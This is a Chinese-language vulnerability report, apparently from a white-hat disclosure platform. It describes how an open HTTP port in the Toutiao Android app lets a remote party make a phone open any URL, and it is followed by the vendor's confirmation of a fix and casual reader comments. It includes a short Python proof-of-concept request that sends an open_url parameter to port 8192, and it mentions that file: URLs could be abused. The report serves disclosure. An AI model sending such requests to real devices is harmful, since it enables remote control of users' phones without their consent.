今日头条开放端口可导致远程在用户手机打开任意网站url

开启一个http server，来监听这个端口。端口号从本身shared_prefs目录下的

multi_process_config.xml文件内获得

它用的是NanoHTTPD来实现的一个http server，http server收到数据后，进行解析，然后进行处理，一般是返回一个http应答，然后不做别的事情。

但是当header满足 GET /xxx?open_url=yyy 形式的时候，程序会执行这些代码

监听com.ss.android.action.openurl的receiver，会把 extra拿出来，当成Intent的data，也就是我们传入的URL，然后调起来Activity:

这样，就可以远程操控手机打开任意的URL了

import httplib
 ip = "**.**.**.**"
 port = 8192
 conn = httplib.HTTPConnection(ip,port)
 conn.request("GET","/detail?open_url=http://**.**.**.**")
 r1 = conn.getresponse()
 print r1.status, r1.reason
 data = r1.read()
 print data

file：开头的URL，可用来安装app，或打开本地文件，这里就不描述了

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2016-03-04 19:13

厂商回复：

确认问题存在，已经处理。感谢提醒

最新状态：

暂无

1. 2016-02-29 16:59 | 子非海绵宝宝 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

   1

   眯眯眼700W表示 你的mac要啥配置的

   1# 回复此人

2. 2016-02-29 17:00 | Coody ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产；如遇冒名顶替接单收徒、绝...)

   1

   啪啪啪

   2# 回复此人

3. 2016-02-29 17:02 | 高小厨 ( 普通白帽子 | Rank:998 漏洞数:91 | 不会吹牛的小二不是好厨子！)

   1

   那么问题来了，远程在用户手机上打开的是哪个网站？

   3# 回复此人

4. 2016-02-29 17:04 | 眯眯眼 ( 普通白帽子 | Rank:376 漏洞数:79 )

   1

   @高小厨 @Coody @子非海绵宝宝 你们也挖个内网漫游给我啊

   4# 回复此人

5. 2016-02-29 17:06 | 珈蓝夜宇 ( 普通白帽子 | Rank:242 漏洞数:34 | 人不彻底绝望一次，就不会懂得什么是自己最...)

   1

   眯眯眼说强烈要求加工资,不加工资怎么大保健.

   5# 回复此人

6. 2016-02-29 17:06 | 子非海绵宝宝 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

   1

   @眯眯眼 把你的帐号发我

   6# 回复此人

7. 2016-02-29 17:09 | BMa ( 核心白帽子 | Rank:2078 漏洞数:229 )

   1

   为了mac，700w自导自演了一场好戏

   7# 回复此人

8. 2016-03-04 19:25 | cwkiller ( 普通白帽子 | Rank:174 漏洞数:39 | 闭关修炼)

   1

   能上今日头条吗

   8# 回复此人

9. 2016-04-18 15:44 | 眯眯眼 ( 普通白帽子 | Rank:376 漏洞数:79 )

   0

   提交漏洞的洞主，取消下匿名，方便发送礼物

   9# 回复此人

10. 2016-05-19 14:17 | 爱宝宝的粑粑 ( 路人 | Rank:10 漏洞数:1 | 爱宝宝)

    0

    @眯眯眼 很抱歉现在才看到，现在取消匿名还来得及吗

    10# 回复此人

11. 2016-05-19 14:57 | 眯眯眼 ( 普通白帽子 | Rank:376 漏洞数:79 )

    0

    @爱宝宝的粑粑 来得及

    11# 回复此人

12. 2016-05-20 03:47 | 爱宝宝的粑粑 ( 路人 | Rank:10 漏洞数:1 | 爱宝宝)

    0

    @眯眯眼 嗯，好的，已经改了

    12# 回复此人